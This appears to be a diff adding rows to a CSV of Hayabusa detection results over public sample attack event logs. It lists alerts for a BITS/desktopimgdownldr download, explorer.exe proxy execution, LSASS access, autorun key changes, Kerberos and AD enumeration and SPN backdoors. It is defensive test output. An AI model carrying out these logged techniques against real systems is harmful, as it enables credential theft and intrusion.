+2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,high,Suspicious Desktopimgdownldr Target File,,rules/sigma/file_event/win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
+2020-07-03 17:55:49.123 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Download LockScreen Image  :  URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx
+2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: explorer.exe  /root,""c:\windows\System32\calc.exe""  :  Path: C:\Windows\explorer.exe  :  User: ECORP\Administrator  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,medium,Explorer Root Flag Process Tree Break,,rules/sigma/process_creation/win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,low,Proxy Execution Via Explorer.exe,,rules/sigma/process_creation/win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-03 18:05:58.367 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding  :  Path: C:\Windows\explorer.exe  :  User: ECORP\Administrator  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-03 18:05:58.583 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: ECORP\Administrator  :  Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-03 18:05:58.739 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\win32calc.exe""   :  Path: C:\Windows\System32\win32calc.exe  :  User: ECORP\Administrator  :  Parent Command: ""C:\Windows\System32\calc.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx
+2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx
+2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-09 06:41:52.449 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx
+2020-07-09 06:41:52.449 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx
+2020-07-09 06:42:01.653 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx
+2020-07-09 06:42:01.653 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx
+2020-07-09 06:43:13.791 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx
+2020-07-09 06:43:13.791 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx
+2020-07-10 05:41:04.488 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ATACORE01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.490 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: PKI01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.496 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: EXCHANGE01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.497 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: WEC01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.501 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: FS02$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.505 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: WSUS01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.534 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: DHCP01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.576 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ATANIDS01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.861 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: PRTG-MON$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.862 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: MSSQL01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.863 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: FS01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.864 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ADFS01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.865 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: WEBIIS01$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.885 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: FS03VULN$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: krbtgt  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.912 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ROOTDC2$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.939 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: krbtgt  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.949 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: krbtgt  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.950 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: krbtgt  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.951 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: krbtgt  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:05.016 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ROOTDC2$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:58.983 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:59.810 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:57:38.917 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59919  :  LogonID: 0x64f5bad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.334 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59920  :  LogonID: 0x64f5bf1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.365 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59921  :  LogonID: 0x64f5c04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.714 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59993  :  LogonID: 0x64f5c7f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.723 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 60017  :  LogonID: 0x64f5cb1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.725 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 60018  :  LogonID: 0x64f5cc8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.728 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 60019  :  LogonID: 0x64f5cf4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.825 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:52.909 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ATACORE01$  :  Workstation: -  :  IP Address: 10.23.42.30  :  Port: 62476  :  LogonID: 0x64f5ef5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:58:11.977 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59641  :  LogonID: 0x64f6471,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:58:11.981 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$  :  Workstation: -  :  IP Address: fe80::1cae:5aa4:9d8d:106a  :  Port: 51370  :  LogonID: 0x64f64a3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:58:12.004 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59643  :  LogonID: 0x64f64ca,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59644  :  LogonID: 0x64f64e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 59645  :  LogonID: 0x64f64f3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 06:22:31.163 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx"
+2020-07-10 06:25:41.773 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx"
+2020-07-10 07:00:14.124 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:14.124 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:14.195 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:14.195 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:17.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe""   :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:28.307 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:28.307 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:28.458 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
